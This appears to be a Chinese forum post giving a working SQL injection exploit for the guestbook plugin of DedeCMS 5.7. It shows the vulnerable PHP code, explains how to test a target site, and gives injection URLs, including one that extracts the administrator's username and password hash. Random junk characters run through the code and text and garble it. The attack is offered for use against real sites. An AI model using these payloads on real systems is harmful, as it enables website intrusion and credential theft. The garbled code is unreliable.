dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7
6 S4 A8 ]+ o  {$ I, x: {- e
( h( X5 M& h3 F; I1 x0 c' ^6 A漏洞文件edit.inc.php具体代码：

9 L. c9 S, O$ ^< ?php  

if(!defined('DEDEINC')) exit('Request Error!');  

   
: @( ^  p) g# W/ @
- [5 n" \, I) r+ g$ ]# Xif(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  

1 b3 `' f, T0 Y- L- C7 u2 V3 belse $GUEST_BOOK_POS = "guestbook.php";  

   

$id = intval($id);  
4 l% |* h$ A. |8 a: l* G# v
8 X4 j5 C- S, I: u" c7 \+ r* [if(empty($job)) $job='view';  
( n1 M" G" S; K+ I1 \( n- [4 O
1 l' ~, m0 q3 y' b   
# A, v0 Y' A; V8 k- Y
if($job=='del' && $g_isadmin)  

% P0 t1 l: b! k  O3 K{  

$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  

ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  
0 t) h) G+ H! C- W& }0 t  M' G
exit();  
, h; k, X  C  D
}  
* w  u" S8 |5 N+ D
1 d/ m  m& G/ u& X" ?3 m4 ~else if($job=='check' && $g_isadmin)  

{  

$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  
9 o# o+ C- {$ t: p
0 j  P$ V6 f! C7 r. e! w+ Y' ]ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  
; V' Z- Z/ ?* k2 V
( y6 L& I8 [  U; Nexit();  

( _' d9 u# u2 r6 g  c- d}  

else if($job=='editok')  
8 z& L1 r2 ~" N8 j7 H0 g
6 ?- R" ^5 s" V1 e{  
$ x" P+ F7 a) m
6 U- ]7 q5 F6 ^: m+ A* t$remsg = trim($remsg);  
5 h- ?! T$ E# |8 K4 I& U2 D
4 l, ?& q# M6 S9 }. _0 t# Dif($remsg!='')  

. n9 s9 O/ B% p7 p{  
7 Y3 K: X# m4 s9 S
( F- P$ I& \  m4 P) Q8 y//管理员回复不过滤HTML By:Errorera blog:errs.cc  

if($g_isadmin)  
) G; I; }" {& ?) t' r
1 v* m) p' L% y5 \, U{  
0 A0 `( Z* i  w& S8 C$ N
$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  
; T6 Q( b, l7 r1 r! `9 n- T2 n
//$remsg <br /><font color=red>管理员回复：</font> }  

4 E$ Z) p5 m9 O& y2 b" Z8 I, ?, welse
" X+ W. d: t; S; M; U; z5 Q. ~
9 d5 ~: c+ b+ L8 g$ j{  

$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  
* h, J5 T# _. z: ^2 i
# O+ q1 a; z! M' M! }7 w$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  
/ B0 Q7 ~5 h3 H% e" D3 ?3 x* [' `$ g
& \0 M# }5 K1 X: x$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  
6 W2 T. L6 P2 c3 N$ n7 Q
' k3 o7 y! T; c% r" R$msg = $oldmsg.$remsg;  

* C3 B& }% R% t2 h2 \" E) Y}  

; E4 E7 k8 [) v* d$ {}  
: B5 |$ G* A9 H4 g
//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  

$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  

ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  
; X1 w% J6 W1 H! X
, k$ r) j+ W4 X( ^0 @) \, ^exit();  
+ f0 {+ T$ o* R, `' x& F; I% c
. V3 g; `( g9 z- V' A: x}  

//home:www.errs.cc  

6 a* C5 s  h" O: R1 Xif($g_isadmin)  

" G& l% [# x4 l+ q7 I! s{  

- L) l1 r7 V1 U$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  
7 v6 X  g0 p" Z( v$ f9 E+ u" D
}  

. I7 c$ d3 Q& @* e/ Relse
; y/ O; q" ~3 t$ ^
{  

$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

} 漏洞成功需要条件：
$ _: _  R- V. f. ~0 v" V1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

怎么判断是否存在漏洞：
先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
1 x) @- ~9 ]" j' I5 Q; O然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
7 m% |. [4 Q* V访问：
3 }0 L7 _# j3 ?! g1 u* P
www.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
) ^1 k2 D" {$ W* T! V* q- i跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证


明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
+ w* d* X) ?# u4 s' P$ ^8 C如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
3 s3 m" Z9 ~' l那么再次访问

. \7 X0 a2 F6 hwww.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().

$ J' {3 H5 i9 `7 m/ C大概利用就是这样，大家有兴趣的多研究下！！

5 N& V) F) u- E最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！
, }6 w* w" ?2 ^
view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='